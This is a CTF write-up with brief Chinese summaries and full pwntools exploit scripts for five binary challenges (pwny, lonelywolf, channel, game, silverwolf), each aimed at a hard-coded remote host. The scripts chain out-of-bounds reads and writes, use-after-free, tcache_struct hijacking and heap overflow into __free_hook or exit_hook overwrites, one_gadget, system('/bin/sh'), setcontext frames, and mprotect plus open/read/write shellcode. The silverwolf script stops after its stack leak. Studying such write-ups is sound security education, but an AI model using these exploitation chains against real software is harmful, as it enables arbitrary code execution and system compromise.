pwnf
数组越界,负数泄露libc,任意地址写劫持exit_hook为one_gadget从而getshell
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
#context.log_level = 'debug'
binary = 'pwny'
elf = ELF('pwny')
libc = elf.libc  # the libc pwntools pairs with this binary locally; symbol offsets below come from it
context.binary = binary
DEBUG = 0  # 0: remote target; truthy: local process; 2: ssh tube (see below)
# NOTE(review): indentation was lost in the paste. The two conditionals are
# reconstructed as sequential top-level statements, so DEBUG == 2 would first
# start a local process and then rebind p to the ssh tube.
if DEBUG:
    p = process(binary)
    #p = process(["qemu-","-L","","-g","1234",binary])
    #p = process(["qemu-","-L","",binary])
else:
    host = "124.70.13.20"  # CTF endpoint hard-coded by the author
    port = 20798
    p = remote(host,port)
if DEBUG == 2:
    host = ""  # placeholders never filled in: this branch is not usable as written
    port = 0
    user = ""
    passwd = ""
    p = ssh(host,port,user,passwd)
def l64():
    """Receive through the next 0x7f byte and unpack the last 6 bytes as a little-endian u64 (0x7f is the usual top byte of a user-space x86-64 pointer)."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8,"\x00"))
def l32():
    """Receive through the next 0xf7 byte and unpack the last 4 bytes as a little-endian u32."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4,"\x00"))
def sla(a,b):
    """sendline *b* once prompt *a* has been received; both are coerced with str()."""
    return p.sendlineafter(str(a),str(b))
def sa(a,b):
    """send *b* (no trailing newline) once prompt *a* has been received; both coerced with str()."""
    return p.sendafter(str(a),str(b))
def lg(name,data):
    """Log *data* as a labelled hex value through the tube's success()."""
    return p.success(name + ": 0x%x" % data)
def se(payload):
    """Raw send."""
    return p.send(payload)
def rl():
    """Receive whatever is pending."""
    return p.recv()
def sl(payload):
    """Raw sendline."""
    return p.sendline(payload)
def ru(a):
    """Receive up to and including *a*."""
    return p.recvuntil(str(a))
def cmd1(a):
    """Menu option 1: answer 'choice: ' with 1, then 'Index: ' with *a* exactly as given (callers pass packed bytes)."""
    for prompt, answer in (('choice: ','1'), ('Index: ',a)):
        p.sendlineafter(prompt, answer)
def cmd2(a,b):
    """Menu option 2: answer 'choice: ' with 2 and 'Index: ' with str(*a*), then send *b* as a bare line."""
    for prompt, answer in (('choice: ','2'), ('Index: ',str(a))):
        p.sendlineafter(prompt, answer)
    p.sendline(b)
# Root cause per the author's summary: the index is used without a bounds
# check, so negative values read and write outside the array. A range check
# on the index before use (rejecting negatives) removes every step below.
sla(': ','2')  # option 2 with index 0x100, twice; the author does not say what this sets up
sla('Index: ',str(0x100))
sla(': ','2')
sla('Index: ',str(0x100))
cmd1(p64((-8)&0xffffffffffffffff))  # option 1 read at index -8, sent as 8 raw packed bytes
ru('Result: ')
libc_base = int(p.recv(12),16) - libc.sym['_IO_2_1_stdout_']  # 12 hex digits; the subtraction assumes the leaked qword is &_IO_2_1_stdout_
lg("libc_base",libc_base)
#__rtld_global+3848
addr = libc_base + 0x61b060 + 3848  # write target (the exit hook per the summary), as a libc-relative offset
one = [0x4f3d5,0x4f432,0xe5617,0xe561e]  # one_gadget candidates for this libc build
og = libc_base + one[1]
cmd1(p64((-11)&0xffffffffffffffff))  # read at index -11; rebased as a program address below
ru('Result: ')
codebase_addr = int(p.recv(12),16)-0x202008+0x202060  # author's rebase; from the arithmetic the array appears to sit at 0x202060 in the binary (unverified)
lg("codebase_addr",codebase_addr)
cmd1(p64((-1)&0xffffffffffffffff))  # read at index -1; its 'Result' is never parsed (the next sendlineafter skips past it)
off = addr - codebase_addr
lg("off",off)
# Python 2 integer division: under Python 3 this would be a float and str() would send e.g. "123.0"
cmd2(off/8,p64(og))  # option 2 write: qword index off/8 relative to the array <- one_gadget address
attach(p)  # leftover debug attach; p is a remote tube here, so this is not meaningful against the live target
p.sendline("3")  # option 3 (exit per the summary) reaches the hijacked hook
p.interactive()
lonelywolf
uaf漏洞,劫持tcache_struct,free之后泄露libc,然后劫持free_hook为one_gadget从而getshell
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'lonelywolf'
elf = ELF('lonelywolf')
libc = elf.libc  # the libc pwntools pairs with this binary locally; symbol offsets below come from it
context.binary = binary
DEBUG = 0  # 0: remote target; truthy: local process; 2: ssh tube (see below)
# NOTE(review): indentation was lost in the paste. The two conditionals are
# reconstructed as sequential top-level statements, so DEBUG == 2 would first
# start a local process and then rebind p to the ssh tube.
if DEBUG:
    p = process(binary)
    #p = process(["qemu-","-L","","-g","1234",binary])
    #p = process(["qemu-","-L","",binary])
else:
    host = "124.70.13.20"  # CTF endpoint hard-coded by the author
    port = 20757
    p = remote(host,port)
if DEBUG == 2:
    host = ""  # placeholders never filled in: this branch is not usable as written
    port = 0
    user = ""
    passwd = ""
    p = ssh(host,port,user,passwd)
def l64():
    """Receive through the next 0x7f byte and unpack the last 6 bytes as a little-endian u64 (0x7f is the usual top byte of a user-space x86-64 pointer)."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8,"\x00"))
def l32():
    """Receive through the next 0xf7 byte and unpack the last 4 bytes as a little-endian u32."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4,"\x00"))
def sla(a,b):
    """sendline *b* once prompt *a* has been received; both are coerced with str()."""
    return p.sendlineafter(str(a),str(b))
def sa(a,b):
    """send *b* (no trailing newline) once prompt *a* has been received; both coerced with str()."""
    return p.sendafter(str(a),str(b))
def lg(name,data):
    """Log *data* as a labelled hex value through the tube's success()."""
    return p.success(name + ": 0x%x" % data)
def se(payload):
    """Raw send."""
    return p.send(payload)
def rl():
    """Receive whatever is pending."""
    return p.recv()
def sl(payload):
    """Raw sendline."""
    return p.sendline(payload)
def ru(a):
    """Receive up to and including *a*."""
    return p.recvuntil(str(a))
def cmd(idx):
    """Answer the 'choice: ' menu prompt with *idx*."""
    p.sendlineafter("choice: ", str(idx))
def add(size,idx):
    """Menu option 1 (the author's 'add'): answer 'Index: ' with *idx* and 'Size: ' with *size*."""
    for prompt, answer in (("choice: ", 1), ("Index: ", idx), ("Size: ", size)):
        p.sendlineafter(prompt, str(answer))
def free(idx):
    """Menu option 4 (the author's 'free') on slot *idx*."""
    for prompt, answer in (("choice: ", 4), ("Index: ", idx)):
        p.sendlineafter(prompt, str(answer))
def show(idx):
    """Menu option 3 (the author's 'show') on slot *idx*; the caller reads the output."""
    for prompt, answer in (("choice: ", 3), ("Index: ", idx)):
        p.sendlineafter(prompt, str(answer))
def edit(idx,payload):
    """Menu option 2 (the author's 'edit'): select slot *idx*, then send *payload* after 'Content: ' without a newline."""
    p.sendlineafter("choice: ", "2")
    p.sendlineafter("Index: ", str(idx))
    p.sendafter("Content: ", str(payload))
# Root cause per the author's summary: use-after-free. The slot stays usable
# through edit()/show() after free(), which every step below relies on;
# clearing the slot pointer on free removes the primitive.
# (indentation lost in the paste; only the next line is taken as the loop body)
for i in range(0x10):
    add(0x78,0)
free(0)
edit(0,"a"*0x10+'\n')  # UAF write: 16 bytes plus newline into the freed chunk
free(0)  # second free of the same slot
show(0)  # UAF read: prints the freed chunk's content
ru("Content: ")
heap_addr = u64(p.recv(6).ljust(8,"\x00"))  # 6-byte heap pointer
lg("heap_addr",heap_addr)
edit(0,p64(heap_addr-0x9e0+0x10)+p64(0)+'\n')  # plants heap_addr-0x9e0+0x10 in the freed chunk; summary: this hijacks tcache_struct
add(0x78,0)
add(0x78,0)  # per the summary the second allocation is served from the planted address
# add(0x78,"0")
edit(0,"\xff"*0x78+'\n')  # fills that region with 0xff bytes; the author does not explain the value
free(0)
show(0)
libc_base = l64()-96-libc.sym["__malloc_hook"]-0x10  # author's formula; summary: libc leaks after this free
lg("libc_base",libc_base)
sys_addr = libc_base+libc.sym["system"]  # unused below: the final step uses a one_gadget instead
free_hook = libc_base+libc.sym["__free_hook"]
edit(0,'\x01'*0x20+p64(free_hook-0x10)*6+'\n')  # 0x20 bytes of 0x01, then free_hook-0x10 six times
add(0x28,0)  # per the summary this allocation lands at free_hook-0x10
"""
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
"""  # one_gadget output kept by the author as a bare string; no effect at runtime
edit(0,"/bin/sh;"+p64(0x10a41c+libc_base)*2+'\n')  # 8 filler bytes then the third candidate twice; if the chunk is at free_hook-0x10 the second copy covers __free_hook
# for in range()
# show(0)
# add(0x78,1)
# edit(0,'a')
# free(0)
# free(1)
# gdb.attach(p)
free(0)  # free() now goes through the hijacked hook (summary)
p.interactive()
channel
远程qemu-user，libc和heap地址固定，因此先泄露出libc和heap地址，再劫持free_hook为system，稳定获取shell
泄露地址部分
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'channel'
elf = ELF('channel')
libc = ELF("./aarch64-linux-gnu/lib/libc.so.6")  # the target's aarch64 libc, loaded from a local sysroot copy
context.binary = binary
DEBUG = 0  # 0: remote target; truthy: local qemu-aarch64 run; 2: ssh tube (see below)
# NOTE(review): indentation was lost in the paste. The two conditionals are
# reconstructed as sequential top-level statements, so DEBUG == 2 would first
# start a local process and then rebind p to the ssh tube.
if DEBUG:
    # p = process(binary)
    # p = process(["qemu-aarch64","-L","./aarch64-linux-gnu","-g","1234",binary])
    p = process(["qemu-aarch64","-L","./aarch64-linux-gnu",binary])  # user-mode qemu with the sysroot above
else:
    host = "124.70.13.20"  # CTF endpoint hard-coded by the author
    port = 20752
    p = remote(host,port)
if DEBUG == 2:
    host = ""  # placeholders never filled in: this branch is not usable as written
    port = 0
    user = ""
    passwd = ""
    p = ssh(host,port,user,passwd)
def l64():
    """Receive through the next 0x7f byte and unpack the last 6 bytes as a little-endian u64."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8,"\x00"))
def l32():
    """Receive through the next 0xf7 byte and unpack the last 4 bytes as a little-endian u32."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4,"\x00"))
def sla(a,b):
    """sendline *b* once prompt *a* has been received; both are coerced with str()."""
    return p.sendlineafter(str(a),str(b))
def sa(a,b):
    """send *b* (no trailing newline) once prompt *a* has been received; both coerced with str()."""
    return p.sendafter(str(a),str(b))
def lg(name,data):
    """Log *data* as a labelled hex value through the tube's success()."""
    return p.success(name + ": 0x%x" % data)
def se(payload):
    """Raw send."""
    return p.send(payload)
def rl():
    """Receive whatever is pending."""
    return p.recv()
def sl(payload):
    """Raw sendline."""
    return p.sendline(payload)
def ru(a):
    """Receive up to and including *a*."""
    return p.recvuntil(str(a))
def cmd(idx):
    """Answer the '> ' menu prompt with *idx*."""
    p.sendlineafter("> ", str(idx))
def add(key):
    """Menu option 1 (the author's 'add'): send *key* after the 'key> ' prompt, no newline."""
    p.sendlineafter("> ", "1")
    p.sendafter("key> \n", str(key))
def free(idx):
    """Menu option 2 (the author's 'free'): the entry is selected by the key string *idx*."""
    p.sendlineafter("> ", "2")
    p.sendafter("key> \n", str(idx))
def show(idx):
    """Menu option 3 (the author's 'show') for key *idx*; the caller reads the output."""
    p.sendlineafter("> ", "3")
    p.sendafter("key> \n", str(idx))
def edit(key,size,payload):
    """Menu option 4 (the author's 'edit'): select *key*, answer 'len> ' with *size*, then send *payload* after 'content> ' without a newline."""
    p.sendlineafter("> ", "4")
    p.sendafter("key> \n", str(key))
    p.sendlineafter("len> \n", str(size))
    p.sendafter("content> \n", str(payload))
# Leak stage. Per the author's summary, qemu-user gives the remote process
# fixed libc and heap addresses, so the values logged here are hard-coded in
# the getshell script that follows. Entries are addressed by a key string; the
# author does not name the bug class, only that pointers become readable
# through show() after the frees below.
add("a"*0x10)
add("b"*0x10)  # the entry whose contents are shown for the libc leak
add("c"*0x10)
add("d"*0x10)
add("e"*0x10)
add("f"*0x10)
add("g"*0x10)
add("h"*0x10)
add("i"*0x10)
add("g"*0x10)  # duplicate of the "g" key above; kept as written
add("s"*0x10)
add("x"*0x10)
free("a"*0x10)
edit("b"*0x10,0x118,"a"*0x20)  # len 0x118 but only 0x20 bytes of content
free("c"*0x10)
free("d"*0x10)
free("e"*0x10)
free("f"*0x10)
free("g"*0x10)
free("h"*0x10)
free("i"*0x10)
free("a"*0x20)  # "a"*0x20 was never add()ed: it is the content just written into "b", so the lookup appears to match on content (unverified)
cmd(3)  # show("b"*0x10) written out longhand
sa("key> \n",str("b"*0x10))
libc_base = u64(p.recv(3).ljust(0x8,'\x00'))  # only the low 3 bytes are printed
libc_base = libc_base+0x4000000000-libc.sym["__malloc_hook"]-0x7b8+0x1000  # 0x40_0000_0000 restores the guest base (matches the 0x40xxxxxxxx addresses noted at the end)
lg("libc_base",libc_base)
# (indentation lost in the paste; only the next line is taken as the loop body)
for i in range(0x8):
    add("f"*0x20)
free("x"*0x10)
edit("s"*0x10,0x118,"m"*0x20)
free("f"*0x20)
free("m"*0x20)  # again a content string used as the key
show("s"*0x10)
heap_addr = u64(p.recv(3).ljust(8,'\x00'))+0x4000000000-0x2a0  # author's offset to the heap start
lg("heap_addr",heap_addr)
# free("a"*0x10)
# edit("bbbb",0x118,"a"*0x110+p64(0)+p8(0x))
# gdb.attach(p)
p.interactive()
# 0x4000012018
#0x400086c000
getshell部分
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'channel'
elf = ELF('channel')
libc = ELF("./aarch64-linux-gnu/lib/libc.so.6")  # the target's aarch64 libc, loaded from a local sysroot copy
context.binary = binary
DEBUG = 0  # 0: remote target; truthy: local qemu-aarch64 run with a gdbstub on 1234; 2: ssh tube
# NOTE(review): indentation was lost in the paste. The two conditionals are
# reconstructed as sequential top-level statements, so DEBUG == 2 would first
# start a local process and then rebind p to the ssh tube.
if DEBUG:
    # p = process(binary)
    p = process(["qemu-aarch64","-L","./aarch64-linux-gnu","-g","1234",binary])  # -g 1234: qemu waits for a gdb connection
    # p = process(["qemu-aarch64","-L","./aarch64-linux-gnu",binary])
else:
    host = "124.70.13.20"  # CTF endpoint hard-coded by the author
    port = 20752
    p = remote(host,port)
if DEBUG == 2:
    host = ""  # placeholders never filled in: this branch is not usable as written
    port = 0
    user = ""
    passwd = ""
    p = ssh(host,port,user,passwd)
def l64():
    """Receive through the next 0x7f byte and unpack the last 6 bytes as a little-endian u64."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8,"\x00"))
def l32():
    """Receive through the next 0xf7 byte and unpack the last 4 bytes as a little-endian u32."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4,"\x00"))
def sla(a,b):
    """sendline *b* once prompt *a* has been received; both are coerced with str()."""
    return p.sendlineafter(str(a),str(b))
def sa(a,b):
    """send *b* (no trailing newline) once prompt *a* has been received; both coerced with str()."""
    return p.sendafter(str(a),str(b))
def lg(name,data):
    """Log *data* as a labelled hex value through the tube's success()."""
    return p.success(name + ": 0x%x" % data)
def se(payload):
    """Raw send."""
    return p.send(payload)
def rl():
    """Receive whatever is pending."""
    return p.recv()
def sl(payload):
    """Raw sendline."""
    return p.sendline(payload)
def ru(a):
    """Receive up to and including *a*."""
    return p.recvuntil(str(a))
def cmd(idx):
    """Answer the '> ' menu prompt with *idx*."""
    p.sendlineafter("> ", str(idx))
def add(key):
    """Menu option 1 (the author's 'add'): send *key* after the 'key> ' prompt, no newline."""
    p.sendlineafter("> ", "1")
    p.sendafter("key> \n", str(key))
def free(idx):
    """Menu option 2 (the author's 'free'): the entry is selected by the key string *idx*."""
    p.sendlineafter("> ", "2")
    p.sendafter("key> \n", str(idx))
def show(idx):
    """Menu option 3 (the author's 'show') for key *idx*; the caller reads the output."""
    p.sendlineafter("> ", "3")
    p.sendafter("key> \n", str(idx))
def edit(key,size,payload):
    """Menu option 4 (the author's 'edit'): select *key*, answer 'len> ' with *size*, then send *payload* after 'content> ' without a newline."""
    p.sendlineafter("> ", "4")
    p.sendafter("key> \n", str(key))
    p.sendlineafter("len> \n", str(size))
    p.sendafter("content> \n", str(payload))
# Getshell stage. Per the author's summary the remote process runs under
# qemu-user with fixed libc and heap addresses, so the values leaked by the
# previous script are hard-coded here. local_* are the values observed locally
# and are not used below.
local_heap = 0x40009e0000
local_libc = 0x400086c000
libc_addr = 0x4000848000  # remote libc base
heap_addr = 0x40009bc000  # remote heap base
#0x40009e06a0
add("x"*0xf0+p64(0)+p64(0x101))  # 0x100-byte key: 0xf0 filler then two packed qwords; the author leaves the values uncommented
add("a"*0x10)
add("b"*0x10)
add("c"*0x10)
add("d"*0x10)
add("/bin/sh\x00"*2)  # this key is also what free() hands to the hijacked hook at the end (summary: free_hook -> system)
free("c"*0x10)
free("a"*0x10)
free("d"*0x10)
edit("/bin/sh\x00"*2,0x118,"a"*0x100+p64(heap_addr-0x410+0x7b0))  # 0x100 filler then a heap pointer
pay = '\x00'*0x18+p64(0x121)+p64(heap_addr-0x410+0xa10)+p64(heap_addr+0x10)  # blob of packed heap pointers used as a free() "key"
free(pay.ljust(0x100,'\x00'))
edit("/bin/sh\x00"*2,0xf0,"a"*0x18+p64(0x121)+p64(libc.sym["__free_hook"]+libc_addr)+p64(0))  # plants the address of __free_hook
edit("/bin/sh\x00"*2,0x110,"aaaa")
edit("/bin/sh\x00"*2,0x110,p64(libc_addr+libc.sym["system"]))  # summary: __free_hook <- system
free("/bin/sh\x00"*2)  # free() now reaches system with the "/bin/sh" key (summary)
# free("")
# pay = '\x00'*0x18+p64(0x21)+p64(0x00000040009e0c50)+'\x00'*0x10+p64(0x121)
# free(pay.ljust(0x100,"x"))
p.interactive()
#local_heap = 0x40009e0000
#local_libc = 0x400086c000
# 0x4000012018
# libc: 0x400086c000
# heap: 0x40009bc000
game
没有对边界进行检查，因此可以堆溢出；开了沙盒，因此劫持free_hook为setcontext，利用fsop来orw读出flag
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'game'
elf = ELF('game')
libc = elf.libc  # the libc pwntools pairs with this binary locally; symbol and gadget offsets below come from it
context.binary = binary
DEBUG = 0  # 0: remote target; truthy: local process; 2: ssh tube (see below)
# NOTE(review): indentation was lost in the paste. The two conditionals are
# reconstructed as sequential top-level statements, so DEBUG == 2 would first
# start a local process and then rebind p to the ssh tube.
if DEBUG:
    p = process(binary)
    #p = process(["qemu-","-L","","-g","1234",binary])
    #p = process(["qemu-","-L","",binary])
else:
    host = "124.70.13.20"  # CTF endpoint hard-coded by the author
    port = 20797
    p = remote(host,port)
if DEBUG == 2:
    host = ""  # placeholders never filled in: this branch is not usable as written
    port = 0
    user = ""
    passwd = ""
    p = ssh(host,port,user,passwd)
def l64():
    """Receive through the next 0x7f byte and unpack the last 6 bytes as a little-endian u64 (0x7f is the usual top byte of a user-space x86-64 pointer)."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8,"\x00"))
def l32():
    """Receive through the next 0xf7 byte and unpack the last 4 bytes as a little-endian u32."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4,"\x00"))
def sla(a,b):
    """sendline *b* once prompt *a* has been received; both are coerced with str()."""
    return p.sendlineafter(str(a),str(b))
def sa(a,b):
    """send *b* (no trailing newline) once prompt *a* has been received; both coerced with str()."""
    return p.sendafter(str(a),str(b))
def lg(name,data):
    """Log *data* as a labelled hex value through the tube's success()."""
    return p.success(name + ": 0x%x" % data)
def se(payload):
    """Raw send."""
    return p.send(payload)
def rl():
    """Receive whatever is pending."""
    return p.recv()
def sl(payload):
    """Raw sendline."""
    return p.sendline(payload)
def ru(a):
    """Receive up to and including *a*."""
    return p.recvuntil(str(a))
def cmd(idx):
    """Return the 'op:<idx>' line (newline-terminated) that opens every command sent to the game's parser."""
    return "op:%s\n" % (idx,)
def add(size1,size2):
    """Command 1: 'op:1', 'l:<size1>', 'w:<size2>' lines, then the blank CRLF line that ends a command."""
    lines = [cmd(1), "l:%s\n" % (size1,), "w:%s\n" % (size2,), '\r\n']
    return "".join(lines)
def add2(idx1,size):
    """Command 2: 'op:2', 'id:<idx1>', 's:<size>' lines, then the blank CRLF line; the description itself is sent separately via add2p()."""
    lines = [cmd(2), "id:%s\n" % (idx1,), "s:%s\n" % (size,), '\r\n']
    return "".join(lines)
def free(idx):
    """Command 3: 'op:3' then 'id:<idx>', then the blank CRLF line."""
    return "".join([cmd(3), "id:%s\n" % (idx,), '\r\n'])
def show():
    """Command 4 takes no arguments: 'op:4' followed by the blank CRLF line."""
    return "".join((cmd(4), "\r\n"))
def add2p(payload):
    """Send the description *payload* once the 'desc> ' prompt that follows command 2 appears (no newline added)."""
    p.sendafter("desc> ", str(payload))
def c5(idx):
    """Command 5 on *idx* (author's note: -y)."""
    return "".join([cmd(5), "id:%s\n\r\n" % (idx,)])
def c6(idx):
    """Command 6 on *idx* (author's note: +y)."""
    return "".join([cmd(6), "id:%s\n\r\n" % (idx,)])
def c7(idx):
    """Command 7 on *idx* (author's note: -x)."""
    return "".join([cmd(7), "id:%s\n\r\n" % (idx,)])
def c8(idx):
    """Command 8 on *idx* (author's note: +x)."""
    return "".join([cmd(8), "id:%s\n\r\n" % (idx,)])
def menup(payload):
    """Send a command block built by the helpers above once the 'cmd> ' prompt appears."""
    p.sendafter("cmd> ", str(payload))
# menup(add(0x4,0x4))
# menup(add2(1,0x1000))
# add2p("a"*0x100)
# menup(show())
# free(1)
# menup(add2(1,0x20))
# add2p("\n")
# menup(show())
# libc_base = l64()-0x0a+0xa0-96-libc.sym["__malloc_hook"]-0x10
# lg("libc_base",libc_base)
# Root cause per the author's summary: positions are not bounds-checked, so
# the move command below can be repeated past the edge and later writes land
# outside their buffer. Range-checking the coordinates before use closes it.
# The summary mentions FSOP, but the code below uses a SigreturnFrame fed to
# setcontext+53 and a ROP chain instead.
menup(add(0x4,0x7))  # command 1 with l=4, w=7 (names taken from the protocol only)
menup(add2(0x91,0x100))  # command 2: id 0x91, size 0x100, then its description
add2p("a"*0x100)
menup(add2(3,0x100))
add2p("a"*0x100)
menup(add2(4,0x500))  # two 0x500 entries; id 4 is freed below for the leak
add2p("a"*0x500)
menup(add2(5,0x500))
add2p("a"*0x500)
# (indentation lost in the paste; only the next line is taken as the loop body)
for i in range(21):
    menup(c8(0x91))  # the author's "+x" move applied 21 times to id 0x91
menup(free(4))
menup(add2(7,0x100))
add2p('\n')  # 1-byte description; presumably leaves stale bytes in place for show() (unverified)
menup(show())
# author's libc-base formula; the extra -0x200 differs from the commented-out attempt above, so the constants are empirical
libc_base = l64()-0x0a+0xa0-96-libc.sym["__malloc_hook"]-0x10-0x200
lg("libc_base",libc_base)
menup(free(7))
menup(free(3))
menup(free(0x91))
menup(add2(0x45,0x180))  # 0x150 bytes of description follow: size-looking values (0x31, 0x111) and the address of __free_hook
add2p("a"*0x100+p64(0)+p64(0x31)+p64(0)*4+p64(0)+p64(0x111)+p64(libc_base+libc.sym["__free_hook"])+p64(0))
frame = SigreturnFrame()  # x86-64 register frame consumed by setcontext below
free_hook = libc.symbols["__free_hook"]+libc_base
lg("free_hook",free_hook)
syscall = 0x00000000000d29d5+libc_base  # gadget offsets are for the author's libc build
# '+' binds tighter than '&', so this is (sym+base) & mask: the page that contains __free_hook
free_hook1 = libc.sym["__free_hook"]+libc_base&0xfffffffffffff000
frame.rdi = 0
frame.rsi = free_hook1
frame.rdx = 0x2000
frame.rsp = free_hook1
frame.rip = syscall  # rax is left at the frame default; the author does not state which syscall this runs
menup(add2(0x44,0x100))
add2p(str(frame))  # the frame is the description of entry 0x44
menup(add2(0x66,0x100))
add2p(p64(libc_base+libc.sym["setcontext"]+53))  # summary: __free_hook <- setcontext(+53); per the summary this allocation lands on the hook
menup(free(0x44))  # freeing entry 0x44 invokes the hook with the frame as its context (summary)
pop_rdi = libc_base+0x000000000002155f
pop_rsi = libc_base+0x0000000000023e8a
pop_rdx = libc_base+0x0000000000001b96
pop_rsp = libc_base+0x0000000000003960  # unused below
pop_rax = libc_base+0x0000000000043a78
# ROP chain at free_hook1: rax=10 is mprotect on x86-64, so this is
# mprotect(free_hook1, 0x2000, 7) followed by a jump to free_hook1+0x70 where the
# shellcode is placed. It only works because the sandbox still allows mprotect
# with PROT_EXEC; denying that in the seccomp policy blocks this path.
payload = [
    pop_rdi,
    free_hook1,
    pop_rsi,
    0x2000,
    pop_rdx,
    0x7,
    pop_rax,
    10,
    syscall,
    free_hook1+0x70
]
sc = shellcraft.open("./flag")  # open/read/write shellcode: the "orw" of the summary
sc += shellcraft.read("rax",free_hook1+0x200,0x100)
sc += shellcraft.write("1",free_hook1+0x200,0x100)
# gdb.attach(p,"b free")
p.sendline(flat(payload).ljust(0x70,'\x90')+asm(sc))  # sent raw, not through a menu command: it is what the frame's syscall reads
# menup(c5(1))
# menup(c5(1))
# menup(c5(1))
# menup(c5(1))
# menup(c5(1))
# menup(show())
# menup(c6(1))
# menup(show())
# menup(c7(1))
# menup(show())
# menup(c8(1))
# menup(show())
# p.recv()
# menup(free(1))
# p.send(free(1))
p.interactive()
#0x000055555575c030
silverwolf
uaf漏洞,开了沙盒,劫持tcache_struct,泄露libc以及栈地址,劫持栈地址进行rop,从而orw出flag
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'silverwolf'
elf = ELF('silverwolf')
libc = elf.libc  # the libc pwntools pairs with this binary locally; symbol and gadget offsets below come from it
context.binary = binary
DEBUG = 0  # 0: remote target; truthy: local process; 2: ssh tube (see below)
# NOTE(review): indentation was lost in the paste. The two conditionals are
# reconstructed as sequential top-level statements, so DEBUG == 2 would first
# start a local process and then rebind p to the ssh tube.
if DEBUG:
    p = process(binary)
    #p = process(["qemu-","-L","","-g","1234",binary])
    #p = process(["qemu-","-L","",binary])
else:
    host = "124.70.13.20"  # CTF endpoint hard-coded by the author
    port = 20759
    p = remote(host,port)
if DEBUG == 2:
    host = ""  # placeholders never filled in: this branch is not usable as written
    port = 0
    user = ""
    passwd = ""
    p = ssh(host,port,user,passwd)
def l64():
    """Receive through the next 0x7f byte and unpack the last 6 bytes as a little-endian u64 (0x7f is the usual top byte of a user-space x86-64 pointer)."""
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8,"\x00"))
def l32():
    """Receive through the next 0xf7 byte and unpack the last 4 bytes as a little-endian u32."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4,"\x00"))
def sla(a,b):
    """sendline *b* once prompt *a* has been received; both are coerced with str()."""
    return p.sendlineafter(str(a),str(b))
def sa(a,b):
    """send *b* (no trailing newline) once prompt *a* has been received; both coerced with str()."""
    return p.sendafter(str(a),str(b))
def lg(name,data):
    """Log *data* as a labelled hex value through the tube's success()."""
    return p.success(name + ": 0x%x" % data)
def se(payload):
    """Raw send."""
    return p.send(payload)
def rl():
    """Receive whatever is pending."""
    return p.recv()
def sl(payload):
    """Raw sendline."""
    return p.sendline(payload)
def ru(a):
    """Receive up to and including *a*."""
    return p.recvuntil(str(a))
def cmd(idx):
    """Answer the 'choice: ' menu prompt with *idx*."""
    p.sendlineafter("choice: ", str(idx))
def add(size):
    """Menu option 1 (the author's 'add') on the single slot, index 0, with *size*."""
    for prompt, answer in (("choice: ", 1), ("Index: ", 0), ("Size: ", size)):
        p.sendlineafter(prompt, str(answer))
def edit(payload):
    """Menu option 2 (the author's 'edit') on slot 0: send *payload* after 'Content: ' without a newline."""
    p.sendlineafter("choice: ", "2")
    p.sendlineafter("Index: ", "0")
    p.sendafter("Content: ", str(payload))
def show():
    """Menu option 3 (the author's 'show') on slot 0; the caller reads the output."""
    for prompt, answer in (("choice: ", 3), ("Index: ", 0)):
        p.sendlineafter(prompt, str(answer))
def free():
    """Menu option 4 (the author's 'free') on slot 0."""
    for prompt, answer in (("choice: ", 4), ("Index: ", 0)):
        p.sendlineafter(prompt, str(answer))
# Root cause per the author's summary: use-after-free on the single slot
# (every helper uses index 0). The freed pointer remains readable through
# show() and writable through edit(); nulling the slot on free removes the
# primitive. The sandbox noted in the summary is why the end of the chain
# reads the flag with open/read/write instead of spawning a shell.
add(0x18)
free()
show()  # UAF read of the freed chunk
ru("Content: ")
heap_addr = u64(p.recv(6).ljust(8,"\x00"))-0x1750  # author's offset back to the heap start
lg("heap_addr",heap_addr)
add(0x78)
free()
edit(p64(heap_addr+0x10)+p64(0)+'\n')  # UAF write: plants heap_addr+0x10 in the freed chunk; summary: hijacks tcache_struct
add(0x78)
add(0x78)  # per the summary this second allocation is served from the planted address
edit("\x07"*0x78)  # fills that region with 0x07 bytes; the author does not explain the value
free()
show()
libc_base = l64()-libc.sym["__malloc_hook"]-96-0x10  # author's formula for the leaked pointer
free_hook = libc_base+libc.sym["__free_hook"]
setcontext = libc_base+libc.sym["setcontext"]  # unused below
# 0x20 bytes of 0x01, free_hook eight times, environ twice, heap_addr+0x10
edit('\x01'*0x20+p64(free_hook)*0x8+p64(libc_base+libc.sym["environ"])+p64(libc_base+libc.sym["environ"])+p64(heap_addr+0x10))
add(0x68)  # per the summary this size is served from the environ entry planted above
show()
ru("Content: ")
stack_addr = u64(p.recv(6).ljust(8,"\x00"))  # value of environ: a stack address (summary: stack leak)
lg("stack_addr",stack_addr)
add(0x78)
